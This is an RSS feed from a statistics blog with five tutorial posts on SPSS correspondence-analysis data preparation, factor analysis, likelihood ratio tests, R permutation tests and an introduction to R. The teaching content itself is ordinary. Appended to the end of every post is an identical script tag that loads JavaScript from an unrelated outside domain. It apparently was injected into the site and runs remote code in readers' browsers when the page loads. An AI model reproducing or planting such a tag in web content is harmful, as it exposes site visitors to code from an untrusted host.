<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Jennie Pearson &#187; Statistics</title>
	<atom:link href="http://jenniepearson.com/category/statistics/feed/" rel="self" type="application/rss+xml" />
	<link>http://jenniepearson.com</link>
	<description>Measuring up</description>
	<lastBuildDate>Thu, 31 Dec 2009 01:39:28 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>How to Prepare Data for Correspondence Analysis in SPSS v.12</title>
		<link>http://jenniepearson.com/how-to-prepare-data-for-correspondence-analysis-in-spss-v-12/</link>
		<comments>http://jenniepearson.com/how-to-prepare-data-for-correspondence-analysis-in-spss-v-12/#comments</comments>
		<pubDate>Wed, 21 Oct 2009 03:16:49 +0000</pubDate>
		<dc:creator>Jennie</dc:creator>
				<category><![CDATA[Market Research]]></category>
		<category><![CDATA[Statistics]]></category>

		<guid isPermaLink="false">http://jenniepearson.com/?p=108</guid>
		<description><![CDATA[Correspondence Analysis is a technique more commonly found in Market Research that is used to display relationships between groups of respondents and levels of categories. For example, if you are trying to determine which groups prefer a particular type of snack food, you could use a Correspondence Map to show these preferences in a two [...]]]></description>
			<content:encoded><![CDATA[<p>Correspondence Analysis is a technique more commonly found in Market Research that is used to display relationships between groups of respondents and levels of categories. For example, if you are trying to determine which groups prefer a particular type of snack food, you could use a Correspondence Map to show these preferences in a two dimensional plane.</p>
<p>To perform a Correspondence Analysis, your data will need to take on a particular form (for one example, see table below). In this table,Brand represents the groups you wish to compare (e.g., males vs. females).  In the Attribute, each of the numbers represents a different product being rated by the groups in the Brands column. Finally, the Top 2 Box (%) represents the proportion of respondents within that group who provided a top rating for that Attribute. In the table below, the top row (1,1,.67) means that 67% of Males gave the first attribute a rating of 4 or 5 (out of five). The second row (1,2,.54) indicates that 54% of Males gave the second attribute a rating of 4 or 5.</p>
<p>One thing that makes this a little tricky is that a single row no longer represents one respondent and data from one respondent can now be in multiple groups (rows). For example, both the group for females and the group for young people would represent a 20-year old female who gave a top box rating of Attribute 3.</p>
<p><span id="more-108"></span><br />
<img class="aligncenter size-full wp-image-116" title="Screen shot 2009-10-20 at 6.28.01 PM" src="http://jenniepearson.com/wp-content/uploads/2009/10/Screen-shot-2009-10-20-at-6.28.01-PM.png" alt="Screen shot 2009-10-20 at 6.28.01 PM" width="234" height="287" /></p>
<p>There is more than one way to get the data into this format; the process outlined below is just one way that can be replicated in SPSS by having to make only a few adjustments to the code.</p>
<p>Note: I used SPSS 12.0.2 for Windows – you may have to make additional modifications if using a different version of SPSS.</p>
<p><strong>1. Select the groups you want to compare</strong></p>
<p>In this example we will examine how seven groups rated 10 different options of snack foods on a scale of 1 to 5.  The seven groups are males (Gender=0), females (Gender=1), young (where Age=1), middle aged (where Age=2), old (where Age=3), dog owners (Cell7=0) and cat owners (Cell7=1). The options for snack food are represented by the variables &#8220;option_1&#8243; to &#8220;option_10&#8243;.</p>
<p>Here is what the initial data file might look like:</p>
<p><img class="aligncenter size-full wp-image-150" title="FakeData1" src="http://jenniepearson.com/wp-content/uploads/2009/10/FakeData1.jpg" alt="Correspondence1" width="502" height="200" /></p>
<p><strong>2. (Optional) Recode the data</strong></p>
<p>Recode your groups to correspond to the format of the final output. In other words, recode the variables in numeric order so that once they are all combined together, there will be no duplicates or overlap with variable codes. While this step is optional, it will save time and prevent confusion in subsequent steps.</p>
<p>In this example, we will recode variables for gender, age, and pet owner into one new variable called Brand.  </p>
<pre lang="sas line="1">
RECODE
  Gender
  (0=1) (1=2) INTO Genderr .
EXECUTE .
RECODE
  Age
  (1=3)  (2=4) (Else=5) INTO  Ager .
EXECUTE .
RECODE
 cell7
 (0=6) (1=7) INTO Pet .
EXECUTE .
</pre>
<p>Here is what your data file might look like at this stage:<br />
<img src="http://jenniepearson.com/wp-content/uploads/2009/10/FakeData2.jpg" alt="FakeData2" title="Correspondence2" width="500" height="246" class="aligncenter size-full wp-image-151" /></p>
<p><strong>3. Restructure the Data Using the Variables to Cases Function</strong></p>
<p>VARSTOCASES is a function that allows you to combine information from multiple variables into one.  You can also use it to simplify the working data file, keeping only the variables that you will need and dropping extraneous ones.</p>
<p>The newly created ‘trans1’ will contain all the information from Gender, Age and Pet (here is where you will be thankful for recoding earlier). ‘Index1’ will contain the variable label while ‘trans1’ will contain the numerical code.  Because we want the proportion of Top 2 Box ratings from the 10 options, we will use the ‘/KEEP’ option to list out the variables we want to remain in the data file.  All other variables will be dropped from the data file at this stage.</p>
<pre lang="sas line=">VARSTOCASES  /MAKE trans1 FROM Gender Age Pet
 /INDEX = Index1(trans1)
 /KEEP =  option_1 option_2 option_3 option_4 option_5 option_6
    option_7 option_8 option_9 option_10
 /NULL = KEEP.</pre>
<p>Here&#8217;s what your data would look like at this stage:<br />
<img src="http://jenniepearson.com/wp-content/uploads/2009/10/FakeData41.jpg" alt="Correspondence3" title="Correspondence3" width="557" height="247" class="aligncenter size-full wp-image-157" /></p>
<p><strong>4.Count the Number of Top 2 Box Scores</strong></p>
<p>Now that we have each respondent identified to a particular group, we need to count each time they gave a top 2 box rating for each attribute (in this example, the attributes are the variables called “option_x”).</p>
<p>There are multiple ways to do this, one way is to create new variables and use a “do repeat” function. This code creates one new variable for each attribute and places a one for each top two box score for each of the attributes.</p>
<pre lang="sas line=">compute count_1=0.
compute count_2=0.
compute count_3=0.
compute count_4=0.
compute count_5=0.
compute count_6=0.
compute count_7=0.
compute count_8=0.
compute count_9=0.
compute count_10=0.

do repeat x=option_1 to option_10 / y=count_1 to count_10.
if x=5 or x=4 y=1.
end repeat.
execute.</pre>
<p>Now, your data would look like this:<br />
<img src="http://jenniepearson.com/wp-content/uploads/2009/10/FakeData31.jpg" alt="Correspondence4" title="Correspondence4" width="543" height="304" class="aligncenter size-full wp-image-158" /></p>
<p><strong>5. Aggregate the data</strong></p>
<p>Once you have counted the number of times a respondent provided a top two box rating for each attribute, now you need to find the proportion of respondents within each group that gave a top two box rating.  This can be easily accomplished with the Aggregate function in SPSS.</p>
<p>Aggregate will create a new data file containing only the information you specify. Start by giving your new file a name. Use the ‘/BREAK’ option to specify how you want to group your data, in this example, ‘trans1’ contains our grouping information. The next few lines of code specify how you want SPSS to handle the data.  Because our Count variables are binary, simply taking the mean of a binary variable will return the proportion of respondents who gave a top two box rating.  The last line in the code, ‘/N_BREAK=N’ is a non-mandatory option. This will return the number of respondents within each of the groups.  This is an easy way to check to see if your code is working properly.</p>
<pre lang="sas line=">AGGREGATE
  /OUTFILE="C:\Documents and Settings\yourname\My Documents\data.sav"
  /BREAK=Brand
  /count_1 = MEAN(count_1) /count_2 = MEAN(Count_2) /count_3 = MEAN(Count_3)
  /count_4 = MEAN(Count_4) /count_5 =  MEAN(Count_5) /count_6 = MEAN(Count_6)
  /count_7 = MEAN(Count_7) /count_8 = MEAN(Count_8) /count_9 = MEAN(Count_9)
  /count_10  = MEAN(Count_10)
  /N_BREAK=N.</pre>
<p>Your data would now look something like this:</p>
<p><img src="http://jenniepearson.com/wp-content/uploads/2009/10/FakeData5.jpg" alt="Correspondence5" title="Correspondence5" width="464" height="169" class="aligncenter size-full wp-image-159" /></p>
<p><strong>6. Stack the Data</strong></p>
<p>We are almost done! The next step is to stack the count variables on top of each other. We can use the VARSTOCASES function again to make a new variable from multiple variables and to simplify the dataset down to only the variables we need using the ‘/KEEP’ option.  Notice that the values for the variable Attribute are not numeric &#8211; you will also need to convert this string variable into numeric format in order to perform a Correspondence Analysis.</p>
<pre lang="sas line=">VARSTOCASES  /MAKE T2B FROM count_1 count_2 count_3 count_4 count_5
   count_6 count_7 count_8 count_9 count_10
 /INDEX = Attribute(T2B)
 /KEEP =  Brand N_BREAK
 /NULL = KEEP.

RECODE
  Attribute (CONVERT)
  ('Count_1'=1)  ('Count_2'=2)  ('Count_3'=3)  ('Count_4'=4)  ('Count_5'=5)
  ('Count_6'=6)  ('Count_7'=7)  ('Count_8'=8)  ('Count_9'=9)  ('Count_10'=10)
  INTO  Attribute1 .
EXECUTE .
</pre>
<p>Your data should now look something like this:<br />
<img src="http://jenniepearson.com/wp-content/uploads/2009/10/FakeData6.jpg" alt="CorrespondenceFinal" title="CorrespondenceFinal" width="388" height="398" class="aligncenter size-full wp-image-155" /></p>
<p>The only variables you will need for Correspondence Analysis are Brand, Attribute1 and T2B. Add in the value labels for you Brand and you will be ready to go.</p>
<p><strong>7. Correspondence Analysis</strong></p>
<p>You are now ready to perform a Correspondence Analysis.</p>
<pre lang="sas line=">Weight by T2B .
CORRESPONDENCE TABLE=Attribute1(1 10) BY Brand (1 7)
 /DIMENSIONS=2
 /MEASURE=CHISQ
 /STANDARDIZE=RCMEAN
 /NORMALIZATION=SYMMETRICAL
 /PRINT=TABLE RPOINTS CPOINTS
 /PLOT=NDIM(1,MAX) NONE .</pre>
<p><strong>Here is all of the code for you:</strong></p>
<pre lang="sas line=">RECODE
  s4
  (1,2,3=3)  (4=4) (Else=5) INTO  Age .
EXECUTE .

RECODE
 cell7
 (0=6) (1=7) INTO Pet .
EXECUTE .

VARSTOCASES  /MAKE trans1 FROM Gender Age Pet
 /INDEX = Index1(trans1)
 /KEEP =  option_1 option_2 option_3 option_4 option_5 option_6 option_7
  option_8 option_9 option_10
 /NULL = KEEP.

SAVE OUTFILE="C:\Documents and Settings\yourname\data.sav"
 /COMPRESSED.

compute count_1=0.
compute count_2=0.
compute count_3=0.
compute count_4=0.
compute count_5=0.
compute count_6=0.
compute count_7=0.
compute count_8=0.
compute count_9=0.
compute count_10=0.

do repeat x=option_1 to option_10 / y=count_1 to count_10.
if x=5 or x=4 y=1.
end repeat.
execute.

AGGREGATE
  /OUTFILE="C:\Documents and Settings\yourname\My Documents\data.sav"
  /BREAK=Brand
  /count_1 = MEAN(count_1) /count_2 = MEAN(Count_2) /count_3 = MEAN(Count_3)
  /count_4 = MEAN(Count_4) /count_5 =  MEAN(Count_5) /count_6 = MEAN(Count_6)
  /count_7 = MEAN(Count_7) /count_8 = MEAN(Count_8) /count_9 = MEAN(Count_9)
  /count_10  = MEAN(Count_10)
  /N_BREAK=N.

Weight by T2B .
CORRESPONDENCE TABLE=Attribute1(1 10) BY Brand (1 7)
 /DIMENSIONS=2
 /MEASURE=CHISQ
 /STANDARDIZE=RCMEAN
 /NORMALIZATION=SYMMETRICAL
 /PRINT=TABLE RPOINTS CPOINTS
 /PLOT=NDIM(1,MAX) NONE .</pre>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://jenniepearson.com/how-to-prepare-data-for-correspondence-analysis-in-spss-v-12/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>A Simplified Explanation of Factor Analysis</title>
		<link>http://jenniepearson.com/a-simplified-explanation-of-factor-analysis/</link>
		<comments>http://jenniepearson.com/a-simplified-explanation-of-factor-analysis/#comments</comments>
		<pubDate>Sun, 23 Aug 2009 03:14:44 +0000</pubDate>
		<dc:creator>Jennie</dc:creator>
				<category><![CDATA[Market Research]]></category>
		<category><![CDATA[Statistics]]></category>
		<category><![CDATA[analysis]]></category>
		<category><![CDATA[Factor Analysis]]></category>

		<guid isPermaLink="false">http://jenniepearson.com/?p=95</guid>
		<description><![CDATA[When I first started out after undergrad I was intimidated by many things (more than I care to admit). A number of those things involved statistics. Especially those with fancy names like Multivariate Data Analysis, Factor Analysis, Multiple Linear Regression, Cluster Analysis, Principal Components, Time-Series, etc. But once I got to grad school and started [...]]]></description>
			<content:encoded><![CDATA[<p>When I first started out after undergrad I was intimidated by many things (more than I care to admit). A number of those things involved statistics. Especially those with fancy names like Multivariate Data Analysis, Factor Analysis, Multiple Linear Regression, Cluster Analysis, Principal Components, Time-Series, etc. But once I got to grad school and started learning about all of these, I realized they were all so much easier than I had thought. So easy in fact, that I feel silly for ever being intimidated by them. So I thought I would share with you what some of these things are and show you how simple they are. We will start with Factor Analysis.<br />
<span id="more-95"></span><br />
<strong>What is Factor Analysis: </strong></p>
<p>Many statistical techniques are used to examine relationships between a dependent variable and independent variable(s).  In that regard, Factor Analysis is different. Factor Analysis attempts to detect patterns or relationships among a set of defined variables.  Basically, all Factor Analysis is, is a grouping of correlated variables into factors, or unobserved (latent) constructs. The assumption is that the latent constructs explain the correlation among the observed (not latent) variables. You can use it to takes long list of items and group them together. Thus, not surprisingly, it is commonly known as a data reduction technique. </p>
<p>Unlike regression techniques, you can&#8217;t use FA to make predictions about anything. For example, you could never use FA to say customers with XYZ characteristics are more likely to prefer Product A over Product B. But what you can do is attempt to define underlying constructs. This can be useful when presenting results of a survey to a client who wants to know what qualities are important to their customers or identify attributes of a product that are important, or determine the characteristics of a company&#8217;s highest performing employees. </p>
<p>For example, in a market research survey, you might ask respondents to rate Company X on a list of attributes. Attributes can include things like uniqueness, attractiveness, humorous, enjoyment, ease of shopping, customer service, proximity of stores, cleanliness of stores, corporate responsibility, expensive, cheap, convenient hours, luxury, whatever. Often times, attributes will be correlated, like cleanliness of stores, ease of shopping, convenient hours and customer service.  These attributes might be measuring the similar ideas or constructs. In this example, these three variables may be measuring attitudes toward in-store shopping. </p>
<p>I won&#8217;t go deeply into the difference between <em>Common Factor Analysis</em> (CFA) and <em>Principal Component Analysis</em> (PCA). Just know that they are two similar but distinct types of factor analysis. Both are data reduction techniques but they make very different assumptions about the variance. More information can be found here:<br />
<a href="http://www.ats.ucla.edu/stat/sas/library/factor_ut.htm">http://www.ats.ucla.edu/stat/sas/library/factor_ut.htm</a></p>
<p><strong>When to use Factor Analysis:</strong></p>
<p>Factor Analysis can be used when your survey contains a lot of correlated variables that may be measuring similar underlying constructs. So instead of reporting scores for each individual attribute, you can distill all the attributes into multiple groupings, or factors. A large sample size is also important.</p>
<p>And that&#8217;s it! Not too intimidating after all, was it?<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://jenniepearson.com/a-simplified-explanation-of-factor-analysis/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Lesson of the day: Likelihood Ratio Test</title>
		<link>http://jenniepearson.com/lesson-of-the-day-likelihood-ratio-test/</link>
		<comments>http://jenniepearson.com/lesson-of-the-day-likelihood-ratio-test/#comments</comments>
		<pubDate>Tue, 26 May 2009 22:14:10 +0000</pubDate>
		<dc:creator>Jennie</dc:creator>
				<category><![CDATA[Statistics]]></category>
		<category><![CDATA[analysis]]></category>
		<category><![CDATA[Analytics]]></category>
		<category><![CDATA[hypothesis test]]></category>
		<category><![CDATA[Logistic regression]]></category>
		<category><![CDATA[LRT]]></category>
		<category><![CDATA[regression]]></category>

		<guid isPermaLink="false">http://jenniepearson.com/?p=43</guid>
		<description><![CDATA[I&#8217;ve been cleaning up my computer, going through old files and came across a slew of notes from my Categorical Data Analysis course I took while in grad school at UNL. Apparently, I had a difficult time discerning the difference between residual deviance and null deviance judging by the plethora of question marks on the [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ve been cleaning up my computer, going through old files and came across a slew of notes from my Categorical Data Analysis course I took while in grad school at UNL. Apparently, I had a difficult time discerning the difference between residual deviance and null deviance judging by the plethora of question marks on the lecture notes from that particular class. In case you too are having trouble with these two deviants (:), here&#8217;s an explanation.</p>
<p>Today&#8217;s lesson: Residual deviance, Null deviance and Likelihood Ratio Tests (LRT).</p>
<p>First of all, only someone nerdy enough about logistic regression would still be reading this far, so I&#8217;m going to go ahead and make some assumptions about your background (e.g., you are at least vaguely familiar with generalized linear models).</p>
<p>For starters, let&#8217;s say you&#8217;ve got your response variable (Y) and explanatory variables (X, Z, etc) and you want to find the best fitting model. Naturally, the bestest (not a real word, I know) fitting model is the one with a parameter for each cell of the contingency table, we call this the &#8220;saturated&#8221; model; but this is just far too cumbersome to work with. So it becomes the baseline to which we make comparisons of other (shorter/simpler/easier) models.</p>
<p><em>The Null Deviance</em> assesses the goodness of fit of a model with only the intercept term to the saturated model; basically, it tells you whether at least one of your βs is not equal to zero.<br />
The hypotheses you&#8217;re testing are:</p>
<pre>Ho: logit(π) = α
Ha: logit(π) = the saturated model: γj</pre>
<p><em>The Residual Deviance</em> assesses the goodness of fit of a specified model with k number of βs to the saturated model; this tells you whether the model you&#8217;ve deduced from model building process fits adequately compared to the saturated model.<br />
The hypotheses are:</p>
<pre>Ho: logit(π) = α + β1x1 + β2x2 +...+ βkxk
Ha: logit(π) = the saturated model</pre>
<p>But what if you want to compare two simplified models to each other, not to the saturated model? You set them up normally; the new model you&#8217;re testing is the Ho, the old model is the Ha, run the glm() and simply subtract their residual deviances from each other. Ta-da!! You&#8217;ve just performed a <em>Likelihood Ratio Test</em>!!<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://jenniepearson.com/lesson-of-the-day-likelihood-ratio-test/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Lesson of the day: Permutations with R, long and short</title>
		<link>http://jenniepearson.com/lesson-of-the-day-permutations-with-r-long-and-short/</link>
		<comments>http://jenniepearson.com/lesson-of-the-day-permutations-with-r-long-and-short/#comments</comments>
		<pubDate>Sun, 26 Apr 2009 23:09:15 +0000</pubDate>
		<dc:creator>Jennie</dc:creator>
				<category><![CDATA[Statistics]]></category>
		<category><![CDATA[analysis]]></category>
		<category><![CDATA[Analytics]]></category>
		<category><![CDATA[Chi-square]]></category>
		<category><![CDATA[Pearson]]></category>
		<category><![CDATA[Permutation]]></category>
		<category><![CDATA[R]]></category>
		<category><![CDATA[SAS]]></category>
		<category><![CDATA[SPSS]]></category>
		<category><![CDATA[STATA]]></category>

		<guid isPermaLink="false">http://jenniepearson.com/?p=40</guid>
		<description><![CDATA[While SPSS, SAS and STATA are the most widely used statistical analysis software programs used today, another program is gaining significance across universities and smaller research shops.
R is open source (read: FREE!), lightweight and has features that blow the trads out of the water.
I first heard of it a few years ago, tried using it [...]]]></description>
			<content:encoded><![CDATA[<p>While SPSS, SAS and STATA are the most widely used statistical analysis software programs used today, another program is gaining significance across universities and smaller research shops.<br />
R is open source (read: FREE!), lightweight and has features that blow the trads out of the water.</p>
<p>I first heard of it a few years ago, tried using it but I was bogged down with the syntax programming. One of the reasons SPSS is so popular is because it is so easy to use with drop-down menus. SAS has drop-downs, too, but the syntax is so easy to write, why bother? I&#8217;m not as familiar with STATA but my impression is that it is more similar to SAS than SPSS.</p>
<p>R doesn&#8217;t have drop-downs, you tell it what you want it to do. The advantage is that it is extremely customizable. I haven&#8217;t used SPSS for a while so this may be irrelevant, but back when I used it, you couldn&#8217;t modify your charts and graphs. You could always pick out a graph made in SPSS because of the thick bright red fill (in other words, it was boring). R allows you to define pretty much everything.</p>
<p>I was forced to learn R for a statistics class in grad school. My prof liked to make us do everything the long (and most difficult) way possible.  For one project we had to do a permutation to use a Pearson Chi-square test for independence.</p>
<p>Permutations allow you to test for independence without making assumptions about the data distribution.  For example, the Pearson Chi-square test for Independence assumes a Chi-square distribution. But what if your data isn&#8217;t chi-square? Well, then you do a permutation.</p>
<p>This basically takes your observed data, rearranges it a bunch of times (like 10,000 times, for example), then you look at the distribution of the data assuming the Null Hypothesis is true (i.e., your response and explanatory variables are Independent). So instead of forcing your observed data to take some assumed distribution and increase your Type I error rate, running a permutation allows you to compare the observed results to it&#8217;s own distribution. Or something like that.</p>
<p>There&#8217;s a one line code in R that will do all of this for you:</p>
<p><em>The short way:</em></p>
<pre>chisq.test(gender.table2, correct=FALSE, simulate.p.value = TRUE, B = 1000)</pre>
<p><em>And here&#8217;s the long way:</em></p>
<pre><em><span style="font-style: normal;">#Put data into raw form</span></em>

all.data&lt;- matrix(data=NA, nrow=0, ncol = 2)

#Put data into "raw" form
for (i in 1:nrow(gender.table2))    {
for (j in 1:ncol(gender.table2))    {
all.data&lt;- rbind(all.data, matrix(data = c(i,j), nrow = gender.table2[i,j], ncol=2, byrow=T))
}
}
all.data
save&lt;- xtabs(~all.data[,1]+ all.data[,2])

#First do one permutation to illustrate:
set.seed(8067)
all.data.star&lt;- cbind(all.data[,1], sample(all.data[,2], replace = F))
all.data.star
calc.stat&lt;- chisq.test(all.data.star[,1], all.data.star[,2], correct = F)
calc.stat$statistic

save.star&lt;- xtabs(~all.data.star[,1] + all.data.star[,2])

#Now do this with forloop
do.it&lt;- function(data.set)    {
all.data.star&lt;- cbind(data.set[,1], sample(data.set[,2], replace = F))
chisq.test(all.data.star[,1], all.data.star[,2], correct=F)$statistic
}
summarize&lt;- function(result.set, statistic, df, B)  {
par(mfrow = c(1,2))
#Histogram
hist(x= result.set, main = expression(paste("Histogram of ", X^2, " perm. dist.")))
segments(x0 = statistic, y0 = -10, x1 = statistic, y1 = 10)
#QQ Plot
chi.quant&lt;- qchisq(p= seq(from=1/(B+1), to = 1-1/(B+1), by = 1/(B+1)), df=df)
plot(x= sort(result.set), y = chi.quant, main = expression(paste("QQ-Plot of ", X^2, " perm. dist.")))
abline(a = 0, b = 1)
par(mfrow = c(1,1))
#p-value
mean(result.set&gt;= statistic)
}
#Do.it for 1,000
do.it(data.set = all.data)
B&lt;- 1000
results&lt;- matrix(data = NA, nrow = B, ncol = 1)
set.seed(8067)
for(i in 1:B)    {
results[i,1]&lt;- do.it(all.data)
}
summarize(results, x.sq$statistic, (nrow(gender.table2) - 1) * (ncol(gender.table2)-1), B)</pre>
<p><strong>Here&#8217;s the easy way again:</strong><br />
chisq.test(gender.table2, correct=FALSE, simulate.p.value = TRUE, B = 1000)<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://jenniepearson.com/lesson-of-the-day-permutations-with-r-long-and-short/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>R is not unlike S</title>
		<link>http://jenniepearson.com/r-is-not-unlike-s/</link>
		<comments>http://jenniepearson.com/r-is-not-unlike-s/#comments</comments>
		<pubDate>Tue, 06 Jan 2009 23:12:46 +0000</pubDate>
		<dc:creator>Jennie</dc:creator>
				<category><![CDATA[Statistics]]></category>
		<category><![CDATA[analysis]]></category>
		<category><![CDATA[R]]></category>

		<guid isPermaLink="false">http://jenniepearson.com/?p=39</guid>
		<description><![CDATA[I just heard about this awesome statistical software that doesn&#8217;t cost half my yearly income!
It&#8217;s simply called &#8220;R&#8221; and is part of the GNU project which i had also never heard of but now feel immensely superior to the person I was five minutes ago. They say that R is &#8220;not unlike S&#8221;, which doesn&#8217;t [...]]]></description>
			<content:encoded><![CDATA[<p>I just heard about this awesome statistical software that doesn&#8217;t cost half my yearly income!</p>
<p>It&#8217;s simply called &#8220;R&#8221; and is part of the <a href="http://www.gnu.org/">GNU project</a> which i had also never heard of but now feel immensely superior to the person I was five minutes ago. They say that R is &#8220;not unlike S&#8221;, which doesn&#8217;t mean much to the non-programmer person, but I&#8217;m sure that means something to someone.</p>
<p>Check it out:<br />
<a href="http://www.r-project.org/index.html">The R Project for Statistical Computing!!</a><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://jenniepearson.com/r-is-not-unlike-s/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
